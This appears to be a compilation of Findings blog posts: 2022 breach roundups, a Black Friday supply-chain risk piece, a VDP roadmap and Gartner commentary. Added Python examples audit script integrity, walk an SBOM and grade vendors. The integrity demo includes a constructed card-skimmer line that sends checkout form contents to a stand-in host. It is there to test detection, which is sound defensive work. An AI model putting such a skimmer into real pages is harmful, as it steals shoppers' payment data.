    • Another tech giant hit yet again. On October 19, 2022, Microsoft addressed the public after security researchers at SOCRadar informed Microsoft of a misconfigured Microsoft endpoint. After the discovery, Microsoft explained that the researchers exaggerated the entire situation. This misconfiguration resulted in the potential for unauthenticated access to some business transaction data corresponding to interactions between Microsoft and prospective customers. Information about planning or potential implementation and provisioning of Microsoft services was involved. In addition, the data that was potentially compromised includes names, email addresses, email content, company name, and phone numbers, and may have included attached files relating to business between a customer and Microsoft or an authorized Microsoft partner. 


Verizon:

    • In a notice, the company confirms, “we determined that between October 6 and October 10, 2022, a third party actor accessed the last four digits of the credit card used to make automatic payments on your account. Using the last four digits of that credit card, the third party was able to gain access to your Verizon account and may have processed an unauthorized SIM card change on the prepaid line that received the SMS linking to this notice.” 


Carousell:

    • On October 14, Carousell Singapore disclosed that it experienced a breach. And this wasn’t a small breach either – almost 2 million accounts were compromised. The company explains, “it is unlikely that this incident will result in an identity theft as it does not include information like your NRIC number,” but it is believed that emails were compromised. 


Medibank:

    • Bad news for Medibank, one of the largest Australian private health insurance providers. On October 12, 2022, the company discovered that customer information may have been compromised after a hack on its systems. It was initially thought that the intrusion affected only certain customers, but a week later the company was working on the assumption that all 3.9 million customers were affected. The company said it had received a series of files from the alleged hacker, including 100 ahm policy records containing personal and health claims data, another 1,000 ahm policy records, and files containing some Medibank, ahm and international student customer data. The records provided to the company include names, addresses, dates of birth, Medicare numbers, phone numbers and medical claims data, including information about diagnoses, procedures and the location of medical services.


Twilio:

    • Sometimes companies just can’t catch a break. Cloud communications company, Twilio, disclosed a new data breach stemming from a June 2022 security incident. After a lengthy investigation, the company concluded that 209 customers and 93 Authy end users had accounts that were impacted by the incident. 

 

Don’t let your company end up on this list. See how Findings can help you here.

Supply Chain Risk Management: Your Black Friday Weakest Link


Black Friday is the time of year that is bound to put stress on many businesses’ supply chains. With demand soaring for items across the board, supply chains have already come under pressure from the effects of the past two years, and these delays are becoming more evident every day. So what does this mean for your risk management?

 

Unfortunately, not all risks originate internally. As you know, risks can also arise from within your supply chain. With increased strain (American consumers spent $8.9 billion online during Black Friday 2021) comes increased scrutiny of your business’s reputation, and a temptation to fast-track the vetting of alternative vendors in order to keep up with demand. But thorough vetting should not be sidestepped.

 

The Consequences Of Poor Supply Chain Risk Management On Black Friday Sales

 

Supply Chain Risk Management strategies that focus only on internal threats and ignore the supply chain fall short for two main reasons:

More threat opportunities

The threats that impact internal systems represent only a subset of all threats. Within your supply chain, attack vectors are far broader and more numerous. You can’t always control the types of security exposures that your vendors or suppliers introduce into their products. And the last thing you want is for those exposures to hit your Black Friday sales.


Lack of efficiency

If supply chain risk management isn’t part and parcel of your broader risk management strategy, it’s hard to manage supply chain risks efficiently. If you protect against supply chain threats at all, it ends up being through one-off audits or action against isolated threats.


At one of the busiest times of year, time and efficiency take center stage, and it’s much more efficient to monitor for and address all types of risks – internal and external – through centralized tools and processes.

Read here: All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

 

Major Holidays Leave The Door Open For Major Attacks

Retailers are particularly vulnerable to client-side attacks. Many online retail sites are built on CMS frameworks with a plethora of third-party plug-ins, from blog posting to popups to SEO maintenance. On average, 31 JavaScript resources are loaded per site, each one a third-party dependency that can be altered at its source, which exposes retailers to client-side supply chain attacks such as formjacking, data skimming and Magecart attacks.


Kaseya Attack Affecting the Supply Chain

Though initially thought to affect only around 40 of Kaseya’s direct customers, the attack launched over the 4th of July weekend in 2021 by the Russia-linked ransomware group REvil turned out to have hit over 1,000 downstream companies. With over 40,000 organizations worldwide using at least one Kaseya software product, the potential impact of this supply chain attack was massive. By exploiting zero-day vulnerabilities in Kaseya’s VSA remote management software, the attackers forced a major Swedish grocery chain to shut hundreds of its stores and disrupted 11 schools in New Zealand.


Magento Magecart Attack Prevented in 2021

With millions of transactions being carried out over the Black Friday period, it’s no surprise that this is a key moment for threat actors to leverage vulnerabilities in the supply chain. In fact, the UK’s National Cyber Security Centre (NCSC) warned small businesses about the risk of Magecart attacks on and around Black Friday last year. These attacks are distinctive because they exploit third-party scripts loaded by companies’ websites. Because widely used e-commerce platforms like Adobe’s Magento are trusted and there are few alternatives to them, a single compromised component can impact thousands of sites simultaneously. When the NCSC issued its warning, it reported more than 4,000 small business sites affected.
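As an added illustration (not part of the original post, and not Findings’ code), the following Python script shows the two checks a retailer can run against its own checkout pages before a Black Friday weekend. It lists every third-party <script src> tag that carries no Subresource Integrity (SRI) attribute, which is the condition a Magecart-style swap of a vendor script depends on, and it verifies an SRI hash against a script body so that a tampered copy of a trusted vendor file fails the check. The page markup, the first-party hostname (shop.example.com), the vendor hostnames and the script bodies are all constructed for the demo.

```python
"""Audit third-party <script> tags for missing Subresource Integrity (SRI).

Added example, not code from the original post or from Findings. The HTML,
hostnames and script bodies below are constructed for the demo.
"""
import base64
import hashlib
import re
from urllib.parse import urlparse

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
ATTRIBUTE = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')


def sri_hash(body: bytes, alg: str = "sha384") -> str:
    """Return an SRI token ("sha384-<base64 digest>") for a script body."""
    digest = hashlib.new(alg, body).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(body: bytes, integrity: str) -> bool:
    """True if the body matches any token in the integrity attribute.

    Browsers accept a space-separated list of tokens and use the strongest
    algorithm they support; here any matching token is accepted.
    """
    for token in integrity.split():
        alg = token.partition("-")[0]
        if alg in ("sha256", "sha384", "sha512") and sri_hash(body, alg) == token:
            return True
    return False


def script_tags(html: str) -> list[dict]:
    """Attribute dicts (lower-cased keys) for every <script> tag that has a src."""
    tags = []
    for match in SCRIPT_TAG.finditer(html):
        attrs = {k.lower(): v for k, v in ATTRIBUTE.findall(match.group(1))}
        if "src" in attrs:
            tags.append(attrs)
    return tags


def is_third_party(src: str, first_party_host: str) -> bool:
    """Relative URLs are first party; absolute or protocol-relative URLs are compared by host."""
    host = urlparse(src).hostname
    return host is not None and host.lower() != first_party_host.lower()


def unpinned_third_party_scripts(html: str, first_party_host: str) -> list[str]:
    """URLs of third-party scripts that a Magecart-style swap could alter unnoticed."""
    return [
        tag["src"]
        for tag in script_tags(html)
        if is_third_party(tag["src"], first_party_host) and not tag.get("integrity")
    ]


# Constructed vendor script, and a tampered copy with a card skimmer appended.
WIDGET_BODY = b"window.Widget = { render: function () {} };"
TAMPERED_BODY = WIDGET_BODY + b"\nnew Image().src = 'https://collect.example.net/?d=' + document.forms[0].innerHTML;"

# Constructed page: two first-party scripts, one SRI-pinned vendor script, one unpinned tag.
SAMPLE_HTML = f"""<html><head>
<script src="/static/app.js"></script>
<script src="https://shop.example.com/js/checkout.js"></script>
<script src="https://cdn.example-vendor.com/widget.js"
        integrity="{sri_hash(WIDGET_BODY)}" crossorigin="anonymous"></script>
<script src="https://tags.example-analytics.net/t.js"></script>
</head><body></body></html>"""


if __name__ == "__main__":
    for src in unpinned_third_party_scripts(SAMPLE_HTML, "shop.example.com"):
        print("no SRI on third-party script:", src)
    pinned = sri_hash(WIDGET_BODY)
    print("genuine widget.js verifies:", verify_sri(WIDGET_BODY, pinned))
    print("tampered widget.js verifies:", verify_sri(TAMPERED_BODY, pinned))
```

In a real audit you would fetch each reported src and pass its body to verify_sri on a schedule, so that a changed vendor file is noticed before the browser would silently run it. SRI only works for scripts the vendor serves as fixed, versioned files; a tag that the vendor rewrites underneath you cannot be pinned and needs a different control, such as a strict Content Security Policy or hosting a vetted copy yourself.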


A Better Approach To Supply Chain Risk Management And Intelligence

How do businesses avoid those shortcomings this Black Friday? How can they implement risk management that addresses both internal and external threats?

The answer is to deploy risk management processes and tools that provide the following features:

  • Continuous, real-time intelligence: Businesses need to know – immediately, before performance and security is affected – whenever a risk emerges within any internal or external asset.
  • Complete supply chain risk management: It’s crucial to identify risks that exist at any point in the supply chain. This includes risks introduced not just by third-party vendors with whom you do business directly, but also “fourth-party” vendors, meaning those who supply your direct vendors. Risks can arise from these vendors, too.
  • Automated, scalable compliance: Checking for risks manually doesn’t scale (and takes away precious time, when time is a short commodity). Whether you have one vendor or one thousand, you need automation to ensure that you can detect all potential risks across all internal and external assets – and that nothing falls through the cracks.
  • Centralized compliance: Risk management is inherently fragmented because risks come in many forms and affect many types of systems. Nonetheless, businesses should be able to manage all risks comprehensively using a platform that works across the enterprise. When you centralize risk management, you save time and maximize risk coverage.
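The “fourth-party” point above, and the earlier remark in the CISO panel write-up that compiling a software bill of materials and calling it a day won’t deliver long-tail visibility, both come down to the same question: who is behind your direct suppliers? The following Python script is an added example (not part of the original posts, and not Findings’ code) that walks the dependency graph in a CycloneDX SBOM and reports each component’s distance from your own application, so depth 1 is a third party and depth 2 or more is a fourth party, along with the supplier named for it. The SBOM uses real CycloneDX 1.4 field names (bom-ref, components, supplier, dependencies/dependsOn), but its components, versions and supplier names are constructed for the demo.

```python
"""Walk a CycloneDX SBOM's dependency graph to find the suppliers behind
your suppliers (the "fourth parties").

Added example, not code from the original post or from Findings. The SBOM
below uses real CycloneDX 1.4 field names but its components, versions and
suppliers are constructed for the demo.
"""
import json
from collections import deque

SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"bom-ref": "pkg:app/shopfront@2.1.0",
                               "name": "shopfront", "version": "2.1.0"}},
    "components": [
        {"bom-ref": "pkg:npm/payments-sdk@4.2.0", "name": "payments-sdk",
         "version": "4.2.0", "supplier": {"name": "Example Payments Inc."}},
        {"bom-ref": "pkg:npm/analytics-tag@7.0.0", "name": "analytics-tag",
         "version": "7.0.0", "supplier": {"name": "Example Analytics Ltd."}},
        {"bom-ref": "pkg:npm/http-client@1.9.3", "name": "http-client",
         "version": "1.9.3", "supplier": {"name": "HTTP Client Maintainers"}},
        # No supplier recorded: exactly the blind spot an SBOM alone leaves.
        {"bom-ref": "pkg:npm/tls-shim@0.3.1", "name": "tls-shim", "version": "0.3.1"},
    ],
    "dependencies": [
        {"ref": "pkg:app/shopfront@2.1.0",
         "dependsOn": ["pkg:npm/payments-sdk@4.2.0", "pkg:npm/analytics-tag@7.0.0"]},
        {"ref": "pkg:npm/payments-sdk@4.2.0", "dependsOn": ["pkg:npm/http-client@1.9.3"]},
        {"ref": "pkg:npm/analytics-tag@7.0.0", "dependsOn": ["pkg:npm/http-client@1.9.3"]},
        {"ref": "pkg:npm/http-client@1.9.3", "dependsOn": ["pkg:npm/tls-shim@0.3.1"]},
        {"ref": "pkg:npm/tls-shim@0.3.1", "dependsOn": []},
    ],
})


def supplier_tiers(sbom_text: str) -> dict:
    """Map each bom-ref to its shortest distance from the root and its supplier.

    Depth 1 is a direct (third-party) dependency; depth 2 and beyond are the
    fourth parties. Breadth-first search yields the shortest path, and the
    visited check also terminates on cyclic dependency graphs.
    """
    sbom = json.loads(sbom_text)
    root = sbom["metadata"]["component"]["bom-ref"]
    graph = {d["ref"]: d.get("dependsOn", []) for d in sbom.get("dependencies", [])}
    components = {c["bom-ref"]: c for c in sbom.get("components", [])}

    depth = {root: 0}
    queue = deque([root])
    while queue:
        node = queue.popleft()
        for child in graph.get(node, []):
            if child not in depth:
                depth[child] = depth[node] + 1
                queue.append(child)

    tiers = {}
    for ref, d in depth.items():
        if ref == root:
            continue
        # A ref listed in dependsOn but missing from components still gets a row.
        supplier = (components.get(ref, {}).get("supplier") or {}).get("name")
        tiers[ref] = {"depth": d, "supplier": supplier}
    return tiers


def fourth_parties(sbom_text: str) -> list[str]:
    """Refs reached only through another supplier (depth >= 2)."""
    return sorted(ref for ref, t in supplier_tiers(sbom_text).items() if t["depth"] >= 2)


def unknown_suppliers(sbom_text: str) -> list[str]:
    """Refs whose SBOM entry names no supplier, so there is nobody to assess."""
    return sorted(ref for ref, t in supplier_tiers(sbom_text).items() if not t["supplier"])


if __name__ == "__main__":
    for ref, tier in sorted(supplier_tiers(SAMPLE_SBOM).items(), key=lambda kv: kv[1]["depth"]):
        label = "direct" if tier["depth"] == 1 else f"tier {tier['depth']}"
        print(f"{label:8} {ref:35} supplier={tier['supplier'] or 'UNKNOWN'}")
    print("fourth parties:", fourth_parties(SAMPLE_SBOM))
    print("no supplier on record:", unknown_suppliers(SAMPLE_SBOM))
```

The output is the list a vendor risk team actually needs: the components two or more hops away, and the ones for which the SBOM names no supplier at all. Running this against each new SBOM version, rather than once, is what turns a static bill of materials into the continuous visibility both articles call for.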


The Findings Difference

With Findings, you are provided with an automated, comprehensive supply chain risk management solution that empowers businesses to manage supply chain risks proactively by getting ahead of issues before they happen. Instead of treating the supply chain as a black box from the perspective of compliance, leverage Findings to implement centralized, enterprise-wide supply chain risk management for both internal and external threats. 

Don’t get caught out this Black Friday (or any day!). Get started at Findings.co.

September Security Breach Round Up


Cybersecurity threats have become an integrated part of every company’s lifecycle. They are occurring now more than ever, and hackers are not selective – ultimately putting any company at risk for an attack. 

 

To keep your company safe and your cybersecurity team up to date with the latest trends, it’s important to learn from recent incidents to avoid the same mistakes that left even the world’s largest corporations exposed. 

 

Here are our top 5 September 2022 read-worthy incidents:

 

Uber:

Sneaking out of the house isn’t the only thing teens are getting good at, and a recent breach proves it. On September 15, 2022, Uber fell victim to an attack. A suspected teen hacker, who Uber believes is part of Lapsus$, was able to access Uber’s systems. In a company notice, Uber explained that the attacker likely purchased an Uber EXT contractor’s password on the dark web and, after many attempts, succeeded in accessing that worker’s account. Several internal systems, internal Slack messages, information from an internal tool the company uses to manage invoices, and the company’s HackerOne dashboard were all accessed.


Samsung:

Most would think that one of the world’s biggest tech companies is heavily secure, right? Well… On September 2, 2022, Samsung confirmed a cybersecurity incident that affected customer data. Information such as name, contact and demographic information, date of birth, and product registration information may have been compromised. After further investigation, Samsung discovered that this incident stemmed from an unauthorized third party acquiring information from some of Samsung’s U.S. systems. 


Optus:

Optus, one of Australia’s largest telecommunications companies, suffered a cyberattack and confirmed it on September 22, 2022, through a company announcement. Customer names, dates of birth, phone numbers, email addresses, street addresses, Medicare card numbers, and ID document numbers such as driver’s license and passport numbers of over 9 million people were potentially exposed.


American Airlines (Again?! Really?!):

On September 16, 2022, American Airlines informed customers that it had experienced a security incident in July 2022. The notice explains that an unauthorized actor compromised the email accounts of a limited number of American Airlines employees. Upon further investigation, the company found that personal information such as name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information was accessible through the email accounts.


Tap Air Portugal:

As aviation becomes a hot target, TAP Air Portugal released an important notice to customers on September 21, 2022, regarding a cyber attack discovered back in August. The notice reads, “Regretfully, we want to inform that the following categories of personal data from some customers of TAP have been disclosed: name, nationality, gender, date of birth, address, email, telephone contact, customer registration date and frequent flyer number. The information for each affected customer may vary. We are releasing this notice to make customers aware of this matter. There is no indication that payment data was exfiltrated from TAP’s network.” While the company did not disclose how many people were affected, it is believed that over 1.5 million TAP customers had their data stolen. 


While we’ve only listed 5 of the many incidents that occurred in September, it’s important to mention that breaches occur all the time, and hackers are getting more and more creative and sophisticated. 


As businesses, it’s even more important for you to find ways to prevent, detect, and respond to these attacks in a quick and effective manner. 


Keeping your supply chain secure is vital to keeping it functioning properly and that’s why we’ve put together a supply chain security enhancement checklist for companies to reference. 

 

 

At Findings, we help secure your digital supply chain. Discover how we can benefit your business here.

A CISO’s VDP Security Roadmap, Step-by-Step


When it comes to cybersecurity, discovering vulnerabilities is often the easy part. What tends to be challenging is figuring out where to disclose vulnerabilities once you’ve discovered them.

If someone inside your business or supply chain discovers a vulnerability but fails to report it to the people who need to know about it, the vulnerability may as well not have been discovered at all. It’s only by disclosing and reporting vulnerabilities that stakeholders can remediate them, while also taking steps to avoid falling victim to them until their root cause is addressed.

That’s why establishing vulnerability disclosure programs and policies is critical to cybersecurity success – not to mention the overall health of your business. Setting up a VDP places you ahead of competitors who lack one. It also sends a clear message to vendors, customers, partners, employees and other stakeholders that you take cybersecurity seriously and operate with transparency when you discover vulnerabilities. And it establishes clear policies, robust communication channels and backend processes that help you resolve vulnerabilities and risks quickly.

 

 

But how do you actually create a security VDP initiative? What goes into a VDP, and how do you ensure your VDP application covers all security requirements? Keep reading for answers to those questions as we walk through the five major components of a VDP “roadmap” that can support teams and project managers in disclosing and reporting vulnerabilities, and in making sure they reach the Cybersecurity and Infrastructure Security Agency (CISA). CISA plays a leading role in coordinating vulnerability disclosure, and it has also, incidentally, launched a VDP platform for federal agencies because it recognizes how crucial – and challenging – effective VDP security can be.

 

VDP security step 1: Outline your goals

Creating a VDP to reinforce your security strategy starts with determining exactly what you hope to get out of your VDP.

Ask questions such as:

  • What is the driving factor for your VDP? Having a clear VDP program is essential if you want to work with US officials. Do you want to promote increased security, improve coordination between teams, increase vulnerability visibility or something else? While VDP security operations can do all of these things, you may choose to prioritize one of them in particular.
  • What are your main VDP pain points? What’s currently getting in the way of vulnerability disclosure? Is it a lack of employee education or lack of communication channels, for instance?
  • What role does your VDP play in your overall business? VDPs don’t just serve security purposes. They can also help you achieve business goals by giving you a unique selling proposition.

Once you know your main VDP security goals, you can build and use a VDP application tailored to them.

 

VDP security step 2: Assign responsibilities, develop policies

To start building your program, you need to map responsibilities to stakeholders, then establish policies that define who does what within the context of vulnerability disclosure. CISA offers a template that may be helpful for this purpose.

Identify, for starters, who needs to be aware of the program and who needs to participate in it. Then go deeper by defining specific responsibilities for collecting, analyzing and reporting on vulnerabilities.

Outline as well which security policies your vendors need to adhere to, and how you’ll keep those policies up-to-date. And determine whether vulnerability disclosers will be allowed to remain anonymous. An anonymous disclosure does not make the disclosure any less important. A researcher may simply not want their name on any of the disclosure notes.

Ultimately, your goal during this step should be to lay the groundwork for a community that helps itself with vulnerability disclosure and management. 

 

VDP security step 3: Integrate VDP into your processes

Vulnerability disclosure processes shouldn’t exist in a silo. Instead, they should be integrated into your routine business operations, and your VDP policy map should reflect this.

For example, your VDP should outline how software development, testing and deployment operations interface with VDP reporting requirements. It should also define exactly which tests should be run in an effort to discover vulnerabilities.

By establishing these processes, you not only gain efficiency when it comes to managing vulnerabilities. You also set clear guidelines that employees, researchers and vendors should follow to ensure that all vulnerabilities are discovered and disclosed effectively. You should give CISOs and researchers enough scope so that they can provide valuable feedback, but not so much scope that your team can’t keep up with the incoming reports. 

These policies may also help to drive VDP automation by making it possible to automate VDP discovery and reporting within the context of routine business operations. Education is key across the organization and a security culture needs to be embedded into the fabric of your business. 

 

VDP security step 4: Evaluate vendors

Once you’ve determined which VDP policies your business needs to meet, it’s time to evaluate your vendors and perform due diligence to confirm that they align with your requirements.

Rank your vendors according to their overall security postures. You can sort them into three categories: High security, medium security or low security.

From there, choose which vendors require more monitoring, and which pose such security risks that you can’t work with them. You should also highlight vendors with excellent security records, since you may want to target them for long-term partnerships.

To validate your vendor assessments, collect documentation, including the frameworks and security rules that the vendors adhere to internally. Keep these documents secure and update them periodically because they may change.

 


 

VDP security step 5: Continuously monitor and audit VDP compliance

After rolling out your VDP policies and vetting vendors, you need to monitor, measure and audit continuously to ensure that stakeholders continue to follow the guidelines. Your goal here is to ensure that everyone – including internal users like your employees, as well as vendors and other external parties – remain in compliance with VDP policies you establish.

To make this process efficient, you’ll want to automate it as much as possible. Automation also ensures that you can scale your business as VDP requirements grow continuously more complex, and as you integrate more vendors and other stakeholders into your operations.

 

With VDP, everyone wins (except the bad folks)

Establishing clear, transparent and actionable VDP rules is a win-win for everyone (except, of course, the threat actors who want to exploit vulnerabilities). It lays the foundation for effective collaboration while also strengthening relationships with both internal and external stakeholders. And it facilitates the fast resolution of vulnerabilities and breaches by getting vulnerability data to organizations like CISA as rapidly as possible.

Findings bakes VDP into its platform, making VDP security an effortless operation. With Findings, you can both discover and report on vulnerabilities across your business’s supply chain. Findings builds the “switch” for vulnerability disclosure directly into your business operations, making your VDP processes efficient, scalable and all-encompassing.

 

Learn more by signing up for a Findings demo.

Our Take on Gartner’s Latest Supply Chain Compliance Advice


Going forward, businesses need a new strategy for vetting and monitoring the compliance of their suppliers. But don’t just take our word for it. These are among the takeaways from Gartner’s latest guidance on supply chain compliance and management.

 

Gartner highlights why conventional supplier onboarding methods no longer work as businesses need to onboard suppliers quickly, while also ensuring that suppliers meet their compliance requirements.

 

The global supply chain compliance crisis

You probably already know that supply chains are under stress, to put it mildly. Gartner points to a couple of main reasons why:

 

  • Businesses are increasingly working with suppliers from new geographic regions, where compliance norms may be different. This complicates onboarding and requires a deeper level of compliance inspection.
  • Organizations often need to add vendors quickly in order to keep their supply chains moving. Yet, without a fast onboarding process, integrating suppliers is time-consuming, which increases the stress placed on supply chains.
  • We’d also add that issues like global sanctions, which have become especially pronounced as a result of the ongoing Ukraine-Russia war, add even more complexity to vendor onboarding.

 

We agree wholeheartedly that these are among the key reasons why supply chain compliance and management have become so challenging for the typical business today.

Today, you have to worry not only about whether your vendors meet standard compliance rules, but also about potential sanctions that are subject to constant change. This adds yet more unpredictability and complexity to the onboarding process.

Add to that the surge in supply chain cyber security risks, and it’s no exaggeration to say that operating efficient, compliant supply chains has never been tougher than it is at present.

 

How to streamline supply chain compliance

Gartner suggests three main strategies for addressing the supply chain compliance challenges that businesses currently face.

 

1. Create a playbook for vetting vendors

First, Gartner recommends creating a “playbook that grades each third party’s threat level to determine who gets more attention from the business and compliance.”

 

The idea here is that you can develop preset policies to analyze vendors rapidly during and after the onboarding process. Your policies should reflect information like which risks have impacted your business in the past and how closely a given vendor matches the risk profile of other vendors who have posed challenges.

 

We love this idea not only because it helps businesses to be proactive in their approach to vendor compliance, but also because it lays the groundwork for compliance automation. Playbooks make it possible to implement vendor compliance validation automatically within a security platform, which could sort vendors into high-risk, medium-risk and low-risk categories based on criteria defined in the playbooks.
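The tiering described in step 4 of the VDP roadmap above and in Gartner’s vendor-grading playbook can be written down as a small rule set that is evaluated the same way for every vendor, during onboarding and again whenever a vendor’s profile changes. The following is an added example, not Findings’ code and not Gartner’s; the rule names, point values, tier thresholds, review cadences and the vendor records are all constructed assumptions. The one design choice worth noting is that evidence you have not collected yet is scored as adverse, so a vendor cannot land in the low-risk tier simply by leaving questions unanswered.

```python
"""Constructed vendor-grading playbook (example only; not Findings' own code)."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class Vendor:
    """Evidence collected about one supplier. None means 'not yet collected'."""
    name: str
    data_access: str                          # "none", "internal" or "sensitive"
    has_vdp: Optional[bool] = None            # publishes a vulnerability disclosure policy
    framework_attested: Optional[bool] = None  # documented security framework on file
    sanctions_hit: Optional[bool] = None      # matched a sanctions screening list
    incidents_last_year: Optional[int] = None


@dataclass
class Rule:
    """One playbook criterion. adverse() returns True (risk present), False, or None (unknown)."""
    name: str
    adverse: Callable[[Vendor], Optional[bool]]
    points: int
    blocking: bool = False  # a confirmed hit means you cannot work with the vendor


def _known(value: Optional[bool]) -> Optional[bool]:
    """Invert a yes/no answer only when it was actually answered."""
    return None if value is None else not value


# Assumed playbook: names and weights are illustrative, not a published standard.
PLAYBOOK: List[Rule] = [
    Rule("sanctions match", lambda v: v.sanctions_hit, 10, blocking=True),
    Rule("handles sensitive data", lambda v: v.data_access == "sensitive", 3),
    Rule("no vulnerability disclosure policy", lambda v: _known(v.has_vdp), 2),
    Rule("no attested security framework", lambda v: _known(v.framework_attested), 2),
    Rule("security incidents in the last year",
         lambda v: None if v.incidents_last_year is None else v.incidents_last_year > 0, 2),
]

# (minimum score, tier, days between re-assessments); assumed values.
TIERS = [(8, "high", 30), (4, "medium", 90), (0, "low", 365)]


def grade(vendor: Vendor, playbook: List[Rule] = PLAYBOOK) -> Dict:
    """Apply every rule and map the total to a tier and a monitoring cadence."""
    score = 0
    reasons: List[str] = []
    for rule in playbook:
        outcome = rule.adverse(vendor)
        if outcome is None:
            # Missing evidence is treated as the adverse case until it is collected.
            score += rule.points
            reasons.append(f"{rule.name}: unverified")
        elif outcome:
            if rule.blocking:
                return {"vendor": vendor.name, "tier": "blocked", "score": None,
                        "reasons": [rule.name], "review_days": 0}
            score += rule.points
            reasons.append(rule.name)
    for minimum, tier, days in TIERS:
        if score >= minimum:
            return {"vendor": vendor.name, "tier": tier, "score": score,
                    "reasons": reasons, "review_days": days}
    raise AssertionError("TIERS must end with a zero threshold")


def review_queue(vendors: List[Vendor]) -> List[str]:
    """Vendor names ordered by urgency: shortest review cadence first, then highest score."""
    graded = [grade(v) for v in vendors]
    graded.sort(key=lambda g: (g["review_days"], -(g["score"] or 0)))
    return [g["vendor"] for g in graded]


# Constructed sample vendors; nothing here refers to a real company.
SAMPLE_VENDORS = [
    Vendor("payroll-saas", "sensitive", has_vdp=True, framework_attested=True,
           sanctions_hit=False, incidents_last_year=0),
    Vendor("print-shop", "internal", sanctions_hit=False),  # questionnaire not returned
    Vendor("shell-logistics", "none", sanctions_hit=True),
    Vendor("legacy-erp", "sensitive", has_vdp=False, framework_attested=False,
           sanctions_hit=False, incidents_last_year=1),
]

if __name__ == "__main__":
    for vendor in SAMPLE_VENDORS:
        print(grade(vendor))
    print("review order:", review_queue(SAMPLE_VENDORS))
```

Re-running `grade` on each vendor record whenever new evidence arrives gives the continuous monitoring the roadmap’s step 5 calls for, and the `reasons` list is what you hand back to the vendor (or to your own procurement team) to explain why a tier was assigned.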

2. Automate supply chain compliance

The piece quotes Chris Audet, Senior Director of Research at Gartner, who says, “Compliance leaders must move quickly to onboard third parties and effectively monitor for risks, but many of their traditional methods won’t cut it.”

 

The way to move quickly and monitor for risks comprehensively is to automate risk detection. Automation can help you collect the information you need to make good decisions about vendor risks. It can also automatically flag risks with the help of advanced analytics, and it can help you stay up to date as vendor profiles change. In all of these ways, automation helps businesses to complete vendor onboarding quickly, even if they have an increasing number of vendors to vet and face increasing complexity due to new compliance mandates, new sanctions rules or diverse vendor geographies.

 

3. Streamline upfront due diligence

As another way to speed up onboarding, Gartner advises businesses to “streamline due diligence to focus on critical risks.” It suggests doing this by reducing the number of questions you ask vendors to answer manually. Focus validation around critical risk areas, Gartner suggests, rather than asking a large number of questions that may not be relevant for every vendor.

 

We agree. We’d add, though, that it’s important to leverage automation wherever possible to collect as much data as you can about supplier insurance, safety, environment and sustainability initiatives, legal and financial data and any other information that can be helpful for gaining a 360-degree view of your suppliers and sub-suppliers. With automation, it’s possible to onboard rapidly without compromising on your visibility into supply chain compliance.

 

Bonus advice: Establish a compliance-focused company culture

We think Gartner did a great job of capturing much of what it takes to achieve supply chain compliance. But we’d suggest another strategy that Gartner hasn’t mentioned: Building a compliance-centric culture.

 

A compliance-centric culture is one that maximizes collaboration and communication related to compliance. It aligns compliance with vendor expectations, and it allows all stakeholders – both internal and external ones – to share information rapidly in order to manage compliance and supply chain cyber security risks.


Findings helps you to build this culture by providing a platform that anyone can use to raise compliance flags automatically. With Findings, you get holistic compliance that protects your entire supply chain, while also benefiting from automations that allow you to onboard vendors rapidly.

 

Learn more about how Findings can help you to streamline your compliance.

 
